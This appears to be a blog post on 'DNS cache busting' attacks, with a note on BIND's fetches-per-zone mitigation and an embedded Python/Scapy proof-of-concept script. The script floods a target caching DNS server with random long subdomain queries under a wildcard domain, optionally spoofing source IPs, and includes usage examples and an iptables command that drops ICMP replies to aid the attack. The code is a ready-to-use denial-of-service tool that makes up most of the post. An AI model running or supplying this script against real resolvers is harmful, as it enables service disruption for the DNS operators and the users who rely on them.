DNS Cache busting

DNS Cache busting is a very simple attack against a caching DNS server. All you need is a domain which is confiured to answer for a wild card (Example: *.domain.com,asd.domain.com etc.).
This attack is being used in the wild.

UPDATE: ISC has since introduced some features to bind to mitigate this attack.

https://kb.isc.org/article/AA-01178/0/Recursive-Client-Rate-limiting-in-BIND-9.9-Subscription-Version.html

fetches-per-zone The maximum number of simultaneous iterative queries to any one domain that the server will permit before blocking new queries for data in or beneath that zone. This value should reflect how many fetches would normally be sent to any one zone in the time it would take to resolve them. It should be smaller than recursive-clients. When many clients simultaneously query for the same name and type, the clients will all be attached to the same fetch, up to the max-clients-per-query limit, and only one iterative query will be sent. However, when clients are simultaneously querying for different names or types, multiple queries will be sent and max-clients-per-query is not effective as a limit.

	# DNS wildcard attack POC (cache busting?)
	#
	# DNS Server pwnage from a single host. This tool will clobber a DNS cache server.
	#
	# Theory
	# Force a cache server to cache records for a DNS zone that will answer for non-existant domain names.. http://en.wikipedia.org/wiki/Wildcard_DNS_record
	#
	# Example: *.godaddy.com
	#
	# Running on Ubuntu
	# apt-get install python-scapy
	#
	# Make sure to drop ICMP Unreachable if not spoofing. Since we are not using the system connect() functions the kernel will ICMP unreach to victim (which may or may not impact the results of the attack).
	#
	# iptables -I OUTPUT -p icmp --icmp-type destination-unreachable -j DROP
	#
	# As root
	# Example usage: python dnsb.py ns1.target.com 3.1.33.7 godaddy.com 10000 0
	#
	# BIND 9 default max cache ttl is 7 days.
	# max-cache-ttl sets the maximum time (in seconds) for which the server will cache positive answers (negative answers NXDOMAIN is defined by max-ncache-ttl). The default is one week (7 days). This statement may be used in view or a global options clause.
	from scapy.all import *
	import random
	import string
	import sys
	# inet_ntoa
	import socket
	import struct
	# Maximum subdomain lenght..consumes more memory in the cache.
	# This subdivision can go down to 127 levels deep, and each DNS label can contain up to 63 characters, as long as the whole domain name does not exceed a total length of 255 characters.
	def randomain(size=220, chars=string.letters + string.digits):
	return ''.join(random.choice(chars) for _ in range(size))
	if(os.getuid())!=0:
	print "ERROR: Must be root to use raw sockets."
	sys.exit(1)
	if (len(sys.argv) != 6):
	print "DNS Cache Busting attack Proof of concept"
	print "Usage: " + sys.argv[0] + " < target > < source > < wild card domain > < number of packets > < spoof 0 = off / 1 = on >"
	quit()
	target=sys.argv[1]
	source=sys.argv[2]
	dlist=sys.argv[3]
	num=int(sys.argv[4])
	spoof=int(sys.argv[5])
	# get local IP excluding loopback. A bit misleading, google's cache plays no part in the attack.
	myip=([(s.connect(('8.8.8.8', 80)), s.getsockname()[0], s.close()) for s in [socket.socket(socket.AF_INET, socket.SOCK_DGRAM)]][0][1])
	print "Sending packets to: "+target
	for x in range(0, num):
	# If we want to spoof?
	if spoof == 1:
	randsource=socket.inet_ntoa(struct.pack('>I', random.randint(1, 0xffffffff)))
	myip=randsource
	print myip
	# generate random sub domain
	rdom=randomain()
	rd= rdom + '.' + dlist
	# send out packets :)
	req = IP(dst=target,src=myip)/UDP(sport=random.randint(1025, 65000), dport=53)/DNS(id=random.randint(1025, 65000), opcode=0, qr=0, rd=1, ra=0, qdcount=1, ancount=0, nscount=0, arcount=0,qd=DNSQR(qname=rd, qtype=1, qclass=1),an=0,ns=0,ar=0)
	send(req)

view raw gistfile1.py hosted with ❤ by GitHub